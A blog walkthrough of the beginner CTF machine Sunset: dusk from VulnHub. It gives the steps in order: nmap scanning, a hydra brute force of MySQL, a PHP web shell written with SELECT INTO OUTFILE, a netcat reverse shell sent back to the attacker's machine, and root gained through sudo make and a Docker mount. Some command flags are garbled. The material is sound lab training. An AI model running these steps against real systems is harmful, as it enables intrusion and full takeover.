Sunset: Dusk VM walkthrough

Sunset: dusk is a vulnerable by design Debian based machine created by whitecrOwz. It is available on https://www.vulnhub.com

This machine is ranked as a beginner VM, so it is very much useful for those pentesting learners who have just started to get hands on practice.

We will take an advantage of the vulnerabilities present in this machine i.e. weak credentials which let us inject the PHP file for exploiting Remote Code Execution.

After importing Sunset: dusk on VirtualBox, start the VM:

dusk on VirtualBox

Network Scanning

As we don’t know the IP address of this VM we will get back to our attacking machine i.e. Kali Linux and use netdiscover command to identify the target machine’s IP

Network ScanningWe got the IP of the target machine now, we will perform information gathering by scanning the target IP to identify all the loopholes and open ports of the victim.

Use Nmap tool to scan the target: # nmap 192.168.0.114 -A

nmap 192.168.0.114 -AFrom the above results we can see there is a bunch of open ports running the services including ftp, ssh, http and so on.

Let’s target port 3306 to try for mysql brute force attack with the help of hydra using rockyou.txt file (a password dictionary of compromised passwords from the social media application developer RockYou)

mysql 3306# hydra –l root P /usr/share/wordlists/rockyou.txt.gz  192.168.0.114 mysql

hydra -l root -P mysqlSuccessfully got the weak credentials of MYSQL (user: root and password: password)

 

Also redirect towards 192.168.0.114:8080/

redirect 192This page showing the list of the current directory. Also, there is a hint for writable directory /var/tmp, thus making it easy to exploit the loopholes

list of the current directoryAccess the MYSQL Database

The working directory and the credentials for database are in our hands. By using these let’s inject a malicious code as sql query into a PHP file named “ehacking.php”.

This file will proceed a Remote Code Execution.

SQL Query> select <?php system($_GET[‘cmd’]); ?> into outfile ‘/var/tmp/ehacking.php’ ;

Access the MYSQL Database

There is an entry of our injected file ‘ehacking.php’ at 192.168.0.114:8080

ehacking.phpVerify the Remote Code Execution parameters by executing this PHP file:

http://192.168.0.114:8080/ehacking.php?cmd=id

Remote Code Execution This ensuring we can run system command and send our cmds to the server through this page.

Get back to Kali prompt and type command:

# nc -lvp 1234

Now try to let the server sends us back an nc connection by executing:

http://192.168.0.114:8080/ehacking.php?cmd=nc -e /bin/bash 192.168.0.111 1234

an nc connection

Capturing the first flag (user.txt)

The connection is successfully established.

Find the first flag ‘user.txt’ by going into the directoy /home/dusk and read the data from the user.txt

Capturing the first flag (user.txt)

We have successfully spawned the host machine and captured the first flag!

Capturing the second flag (root.txt)

Now run sudo -l

sudo -l This showing we can execute the three marked binaries as if we were the local user dusk without using a password for sudo.

To break into the user dusk environment, use these commands:

COMMAND=’/bin/sh’

sudo -u make -s –eval=$’x:\n\t-‘”$COMMAND”

sudoAnd we successfully got the user dusk environment. We can see from here, Docker is running on the host machine. Let’s use one of Docker privilege escalation routes, to get a root shell

$ docker run v /:/hostOS i t chrisfosterelli/rootplease

This command will fetch the Docker image from the Docker Hub Registry. We have passed three parameters in it i.e.

  1. -v states you want to create a volume in the Docker instance
  2. -i and -t move Docker into ‘shell mode’ rather than starting a daemon process

docker run

After getting into the root shell get id and go into root directory where you will find root.txt that is our final flag!

CTFWe have successfully captured both the flags. This CTF challenge is very interesting showing how to exploit weak credentials and get the root access.

Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

Blind SQL Injection Tutorial to Hack a Website

In the previous article, we have the basics of SQL Injection; what SQLi is and what are the types of SQL injection. And, In...

What is SQL Injection? Tutorial: Type and Example

What is SQL injection, and what are the types of SQL injection? These are the common questions, and we will seek the answer to...

Are Cisco 300-410 Exam and Its Related Certification Your Pathway to Career Success? Find Out about This

Introduction Career success can mean different things to different people. For some, it could mean having a prestigious title and for others, it could be...

How to Hack Windows 10 Password Using FakeLogonScreen in Kali Linux

This article demonstrates an in-depth guide on how to hack Windows 10 Passwords using FakeLogonScreen. Hacking Windows 10 password is an exciting topic and...